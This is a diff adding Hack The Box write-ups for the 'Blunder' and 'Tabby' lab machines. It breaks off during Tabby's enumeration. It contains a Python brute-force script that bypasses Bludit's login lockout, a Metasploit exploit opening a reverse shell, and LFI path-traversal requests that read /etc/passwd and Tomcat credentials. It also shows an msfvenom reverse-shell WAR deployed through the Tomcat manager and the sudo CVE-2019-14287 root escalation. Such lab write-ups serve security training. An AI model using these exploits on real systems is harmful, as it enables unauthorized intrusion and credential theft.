+ → searchsploit bludit
+ --------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------- ---------------------------------
+ Bludit 3.9.2 - Authentication Brutefo | php/webapps/48746.rb
+ Bludit - Directory Traversal Image Fil | php/remote/47699.rb
+ Bludit 3.9.12 - Directory Traversal | php/webapps/48568.py
+ Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py
+ Bludit 3.9.2 - Authentication Brutefor | php/webapps/49037.rb
+ Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt
+ bludit Pages Editor 3.0.0 - Arbitrary | php/webapps/46060.txt
+ --------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+First we're going to try and generate a password list using cewl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cewl http://10.10.10.191 > passwords.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cat passwords.txt| wc -l
+ 350
+
+
+
+Now there is a [blogpost](https://rastating.github.io/bludit-brute-force-mitigation-bypass/) made by rastating about a Bludit bruteforce mitigation bypass, where he wrote a python script but we're going to modify it as follows:
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → vim exploit.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → cat exploit.py
+ import re
+ import requests
+ import sys
+
+ host = 'http://10.10.10.191'
+ login_url = host + '/admin/login'
+ username = 'fergus'
+
+ f = open(sys.argv[1], 'r')
+ for password in f:
+ if 1 == 1:
+ password = password.strip()
+ session = requests.Session()
+ login_page = session.get(login_url)
+ csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
+
+ headers = {
+ 'X-Forwarded-For': password,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
+ 'Referer': login_url
+ }
+
+ data = {
+ 'tokenCSRF': csrf_token,
+ 'username': username,
+ 'password': password,
+ 'save': ''
+ }
+
+ login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
+ if 'location' in login_result.headers:
+ if '/admin/dashboard' in login_result.headers['location']:
+ print()
+ print('SUCCESS: Password found!')
+ print('Use {u}:{p} to login.'.format(u = username, p = password))
+ print()
+ break
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → python3 exploit.py passwords.txt
+
+
+ [...]
+
+ SUCCESS: Password found!
+ Use fergus:RolandDeschain to login.
+
+
+Now that we found fergus' password, we're going to use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Blunder]
+ → msfconsole
+
+ msf6 > search bludit
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/bludit_upload_images_exec
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+ msf6 exploit(linux/http/bludit_upload_images_exec) > show options
+
+ Module options (exploit/linux/http/bludit_upload_images_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ BLUDITPASS yes The password for Bludit
+ BLUDITUSER yes The username for Bludit
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<****path>'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path for Bludit
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.0.0.10 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Bludit v3.9.2
+
+
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
+ RHOSTS => 10.10.10.191
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
+ BLUDITUSER => fergus
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
+ BLUDITPASS => RolandDeschain
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set TARGETURI /
+ TARGETURI => /
+ msf6 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.14.13
+ LHOST => 10.10.14.13
+ msf6 exploit(linux/http/bludit_upload_images_exec) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [+] Logged in as: fergus
+ [*] Retrieving UUID...
+ [*] Uploading UPAsUhCpbE.png...
+ [*] Uploading .htaccess...
+ [*] Executing UPAsUhCpbE.png...
+ [*] Sending stage (39282 bytes) to 10.10.10.191
+ [+] Deleted .htaccess
+ [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.191:56032) at 2021-06-01 14:59:38 +0200
+
+
+ meterpreter > sysinfo
+ Computer : blunder
+ OS : Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64
+ Meterpreter : php/linux
+
+ meterpreter > shell
+ Process 4491 created.
+ Channel 0 created.
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+And we got a reverse shell as www-data! Now as we take a look around we see the following:
+
+
+ cd ..
+ ls -lash
+ total 28K
+ 4.0K drwxr-xr-x 7 www-data www-data 4.0K Nov 27 2019 .
+ 4.0K drwxrwxr-x 8 www-data www-data 4.0K Apr 28 2020 ..
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K May 19 2020 databases
+ 4.0K drwxr-xr-x 8 www-data www-data 4.0K Apr 28 2020 pages
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K Jun 1 14:07 tmp
+ 4.0K drwxr-xr-x 5 www-data www-data 4.0K Nov 27 2019 uploads
+ 4.0K drwxr-xr-x 4 www-data www-data 4.0K Nov 27 2019 workspaces
+
+ ls -lash databases
+ total 80K
+ 4.0K drwxr-xr-x 3 www-data www-data 4.0K May 19 2020 .
+ 4.0K drwxr-xr-x 7 www-data www-data 4.0K Nov 27 2019 ..
+ 4.0K -rw-r--r-- 1 www-data www-data 438 Apr 28 2020 categories.php
+ 4.0K -rw-r--r-- 1 www-data www-data 3.4K Apr 28 2020 pages.php
+ 4.0K drwxr-xr-x 6 www-data www-data 4.0K Nov 27 2019 plugins
+ 44K -rw-r--r-- 1 www-data www-data 42K Jun 1 14:01 security.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K May 19 2020 site.php
+ 4.0K -rw-r--r-- 1 www-data www-data 2.3K Apr 28 2020 syslog.php
+ 4.0K -rw-r--r-- 1 www-data www-data 52 Apr 28 2020 tags.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K Apr 28 2020 users.php
+
+ cd databases
+ cat users.php
+ <****?php defined('BLUDIT') or die('Bludit CMS.'); ?>
+ {
+ "admin": {
+ "nickname": "Admin",
+ "firstName": "Administrator",
+ "lastName": "",
+ "role": "admin",
+ "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
+ "salt": "5dde2887e7aca",
+ "email": "",
+ "registered": "2019-11-27 07:40:55",
+ "tokenRemember": "",
+ "tokenAuth": "b380cb62057e9da47afce66b4615107d",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "instagram": "",
+ "codepen": "",
+ "linkedin": "",
+ "github": "",
+ "gitlab": ""
+ },
+ "fergus": {
+ "firstName": "",
+ "lastName": "",
+ "nickname": "",
+ "description": "",
+ "role": "author",
+ "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
+ "salt": "jqxpjfnv",
+ "email": "",
+ "registered": "2019-11-27 13:26:44",
+ "tokenRemember": "",
+ "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "codepen": "",
+ "instagram": "",
+ "github": "",
+ "gitlab": "",
+ "linkedin": "",
+ "mastodon": ""
+ }
+ }
+
+ cat users.php | grep password
+ "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
+ "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
+
+ cat users.php | grep salt
+ "salt": "5dde2887e7aca",
+ "salt": "jqxpjfnv",
+
+And here we see that we found potential encrypted credentials:
+
+
+ ls -lash /home
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Apr 27 2020 .
+ 4.0K drwxr-xr-x 21 root root 4.0K Apr 27 2020 ..
+ 4.0K drwxr-xr-x 16 hugo hugo 4.0K May 26 2020 hugo
+ 4.0K drwxr-xr-x 16 shaun shaun 4.0K Apr 28 2020 shaun
+
+
+
+There are 2 users on the box: hugo and shaun so let's try to crack the 2 passwords:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Blunder]
+ → cat users.txt salt passwords.enc
+ hugo
+ shaun
+ 5dde2887e7aca
+ jqxpjfnv
+ bfcc887f62e36ea019e3295aafb8a3885966e265
+ be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Blunder]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: bfcc887f62e36ea019e3295aafb8a3885966e265
+
+ Possible Hashs:
+ [+] SHA-1
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+ HASH: be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7
+
+ Possible Hashs:
+ [+] SHA-1
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+
+So here we are hinted towards the passwords being SHA-1 so let's use john to try and crack them, but no, the trick here was to take a step back and see if there were any other passwords to be found !
+
+
+ pwd
+ /var/www/bludit-3.9.2/bl-content/databases
+
+ cd ../../..
+
+ ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 5 root root 4.0K Nov 28 2019 .
+ 4.0K drwxr-xr-x 15 root root 4.0K Nov 27 2019 ..
+ 4.0K drwxr-xr-x 8 www-data www-data 4.0K May 19 2020 bludit-3.10.0a
+ 4.0K drwxrwxr-x 8 www-data www-data 4.0K Apr 28 2020 bludit-3.9.2
+ 4.0K drwxr-xr-x 2 root root 4.0K Nov 28 2019 html
+
+
+
+And here we see that there is a bludit 3.10.0a version ! so let's see if there are any credentials that probably got left behind in there:
+
+
+ cd bludit-3.10.0a/bl-content/databases/
+ cat users.php
+ <****?php defined('BLUDIT') or die('Bludit CMS.'); ?>
+ {
+ "admin": {
+ "nickname": "Hugo",
+ "firstName": "Hugo",
+ "lastName": "",
+ "role": "User",
+ "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
+ "email": "",
+ "registered": "2019-11-27 07:40:55",
+ "tokenRemember": "",
+ "tokenAuth": "b380cb62057e9da47afce66b4615107d",
+ "tokenAuthTTL": "2009-03-15 14:00",
+ "twitter": "",
+ "facebook": "",
+ "instagram": "",
+ "codepen": "",
+ "linkedin": "",
+ "github": "",
+ "gitlab": ""}
+ }
+
+And here we have the hugo user's encrypted passowrd let's assume that it is also SHA-1 to crack them we can use [crackstation.net](https://crackstation.net/):
+
+
+
+Here we see that taking a step back to find hugo's password was the right decision, so let's privesc to the hugo user:
+
+
+ su - hugo
+ Password: Password120
+ id
+ uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
+ cat user.txt
+ 32XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that's done, the way to find root access onto the box is to check the version of sudo after we spawn a TTY:
+
+
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ hugo@blunder:~$ sudo -l
+ sudo -l
+ Password: Password120
+
+ Matching Defaults entries for hugo on blunder:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User hugo may run the following commands on blunder:
+ (ALL, !root) /bin/bash
+ hugo@blunder:~$ sudo --version
+ sudo --version
+ Sudo version 1.8.25p1
+ Sudoers policy plugin version 1.8.25p1
+ Sudoers file grammar version 46
+ Sudoers I/O plugin version 1.8.25p1
+
+
+
+Here we have an outdated version of sudo which is vulnerable to CVE2019-14287 which is very trivial to exploit:
+
+
+ hugo@blunder:~$ sudo -u#-1 /bin/bash
+ sudo -u#-1 /bin/bash
+ root@blunder:/home/hugo# id
+ id
+ uid=0(root) gid=1001(hugo) groups=1001(hugo)
+ root@blunder:/home/hugo# cat /root/root.txt
+ cat /root/root.txt
+ 53XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to spawn a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/48.md b/Easy/48.md
new file mode 100644
index 0000000..6168d16
--- /dev/null
+++ b/Easy/48.md
@@ -0,0 +1,637 @@
+# Tabby Writeup
+
+
+
+## Introduction :
+
+Tabby is an easy Linux box released back in June 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB]
+ → nmap -vvv -p- 10.10.10.194 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.194
+ Discovered open port 8080/tcp on 10.10.10.194
+ Discovered open port 80/tcp on 10.10.10.194
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nmap -sCV -p 22,8080,80 10.10.10.194
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 07:52 CEST
+ Nmap scan report for 10.10.10.194
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
+ | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
+ |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Mega Hosting
+ 8080/tcp open http Apache Tomcat
+ |_http-title: Apache Tomcat
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80:
+
+
+
+So here we found a domain name and a hyperlink leading to **megahosting.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → sudo -i
+ [sudo] password for nothing:
+
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.194 megahosting.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+
+
+And when we click the hyperlink to the data breach we get the following:
+
+
+
+Here we see that this is a php file with the **file** parameter and let's try to see if there is any LFI by trying to read system files such as **/etc/passwd** :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../../../../../etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+ systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+ systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+ messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+ syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+ _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+ tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+ uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+ tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+ landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+ pollinate:x:110:1::/var/cache/pollinate:/bin/false
+ sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
+ systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+ tomcat:x:997:997::/opt/tomcat:/bin/false
+ mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
+ **ash:x:1000:1000:clive:/home/ash:/bin/bash**
+
+
+
+
+Here we see that the **file** php arguement is vulnerable to LFI, and we now know that **ash** is a valid user on this box. Now let's move over to port 8080 with tomcat:
+
+
+
+Here we have a tomcat9 instance, let's scan for hidden directories there with ffuf:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → ffuf -u http://10.10.10.194:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.194:8080/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ docs [Status: 302, Size: 0, Words: 1, Lines: 1]
+ examples [Status: 302, Size: 0, Words: 1, Lines: 1]
+ host-manager [Status: 302, Size: 0, Words: 1, Lines: 1]
+ index.html [Status: 200, Size: 1895, Words: 201, Lines: 30]
+ **manager [Status: 302, Size: 0, Words: 1, Lines: 1]**
+ :: Progress: [4686/4686] :: Job [1/1] :: 1211 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
+
+
+And here we found the manager page with the 302 status code, so we need to authenticate there:
+
+
+
+Now obviously putting in admin/admin doesn't get us in, however when we close it to get the 401 Unauthorized error code we get something interesting:
+
+
+
+Here we see the original credentials **tomcat:s3cret** , however they got changed obviously, so instead we shift our attention to the fact that the credentials are stored in the **conf/tomcat-users.xml** file, so let's use the LFI to get it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/conf/tomcat-users.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/etc/tomcat-users.xml
+ <****?xml version="1.0" encoding="UTF-8"?> <****!--
+ Licensed to the Apache Software Foundation (ASF) under one or more
+ contributor license agreements. See the NOTICE file distributed with
+ this work for additional information regarding copyright ownership.
+ The ASF licenses this file to You under the Apache License, Version 2.0
+ (the "License"); you may not use this file except in compliance with
+ the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ --> <****tomcat-users xmlns="http://tomcat.apache.org/xml"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
+ version="1.0"> <****!--
+ NOTE: By default, no user is included in the "manager-gui" role required
+ to operate the "/manager/html" web application. If you wish to use this app,
+ you must define such a user - the username and password are arbitrary. It is
+ strongly recommended that you do NOT use one of the users in the commented out
+ section below since they are intended for use with the examples web
+ application.
+ --> <****!--
+ NOTE: The sample user and role entries below are intended for use with the
+ examples web application. They are wrapped in a comment and thus are ignored
+ when reading this file. If you wish to configure these users for use with the
+ examples web application, do not forget to remove the that surrounds
+ them. You will also need to set the passwords to something appropriate.
+ -->
+ <****!-- <****role rolename="tomcat"/> <****role rolename="role1"/> <****user username="tomcat" password=" <****must-be-changed>" roles="tomcat"/> <****user username="both" password=" <****must-be-changed>" roles="tomcat,role1"/> <****user username="role1" password=" <****must-be-changed>" roles="role1"/>
+ --> <****role rolename="admin-gui"/> <****role rolename="manager-script"/> <****user**username="tomcat" password="$3cureP4s5w0rd123!"** roles="admin-gui,manager-script"/>
+ <****/tomcat-users>
+
+And here we found credentials for tomcat: **tomcat:$3cureP4s5w0rd123!**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → ffuf -u http://10.10.10.194:8080/manager/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.3.1 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://10.10.10.194:8080/manager/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ html [Status: 401, Size: 2499, Words: 457, Lines: 64]
+ images [Status: 302, Size: 0, Words: 1, Lines: 1]
+ status [Status: 401, Size: 2499, Words: 457, Lines: 64]
+ **text [Status: 401, Size: 2499, Words: 457, Lines: 64]**
+
+
+
+Here we get the /manager/text URI and if we lookup the tomcat documentation, this is where the sysadmin can execute commands, so let's investigate it, and we can do that from curl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/list
+ OK - Listed applications for virtual host [localhost]
+ /:running:0:ROOT
+ /examples:running:0:/usr/share/tomcat9-examples/examples
+ /host-manager:running:0:/usr/share/tomcat9-admin/host-manager
+ /manager:running:0:/usr/share/tomcat9-admin/manager
+ /docs:running:0:/usr/share/tomcat9-docs/docs
+
+
+
+So from here, just like for the [Kotarak](../Hard/7.html) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -l payloads | grep java\
+ pipe>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -l payloads | grep java
+ java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
+ java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
+ java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
+ java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
+ java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
+ java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
+ java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
+ java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
+ java/shell_reverse_tcp Connect back to attacker and spawn a command shell
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f war > thanksippsec.war
+ Payload size: 1096 bytes
+ Final size of war file: 1096 bytes
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → file thanksippsec.war
+ thanksippsec.war: Zip archive data, at least v2.0 to extract
+
+
+
+Now that we created our war file, let's upload it and deploy it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+Now the trick here is that unlike on the Kotarak box, here we only have access to the commandline's **/manager/text** so we're going to upload our war file and deploy it through the commandline thanks to curl:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/deploy\?path\=/webshell\&update;\=true -T thanksippsec.war
+ OK - Deployed application at context path [/webshell]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/webshell/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 34800
+ id
+ uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
+
+
+
+And we got a reverse shell connection! We are now able to execute commands as the tomcat user. Let's first upgrade our shell to a fully interactive TTY:
+
+
+ # check which commands we can use
+
+ which python python3 curl wget bash
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/bash
+
+ # spawn a TTY with python3's pty module
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ tomcat@tabby:/var/lib/tomcat9$
+
+ # CTRL Z to background the reverse shell netcat process
+
+ tomcat@tabby:/var/lib/tomcat9$ ^Z
+ [1] + 22233 suspended nc -lvnp 9001
+
+ # set the stty as raw with the -echo flags, then foreground the process
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby]
+ → stty raw -echo ; fg
+ [1] + 22233 continued nc -lvnp 9001
+
+ # export the TERM and SHELL environment variables, and set the TTY right (for nano /vim stuff)
+
+ export TERM=screen-256color
+ tomcat@tabby:/var/lib/tomcat9$ export SHELL=bash
+ tomcat@tabby:/var/lib/tomcat9$ stty rows 40 columns 200
+ tomcat@tabby:/var/lib/tomcat9$ reset
+
+ # and once the terminal has resetted, we are now in a fully interactive reverse shell!
+
+ tomcat@tabby:/var/lib/tomcat9$ id
+ uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
+
+
+
+Now from here we can upload linpeas.sh to enumerate the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → locate linpeas.sh
+ /home/nothing/HTB/Admirer/linpeas.sh
+ /home/nothing/HTB/OpenAdmin/linpeas.sh
+ /home/nothing/HTB/Postman/linpeas.sh
+ /home/nothing/HTB/Traverxec/linpeas.sh
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
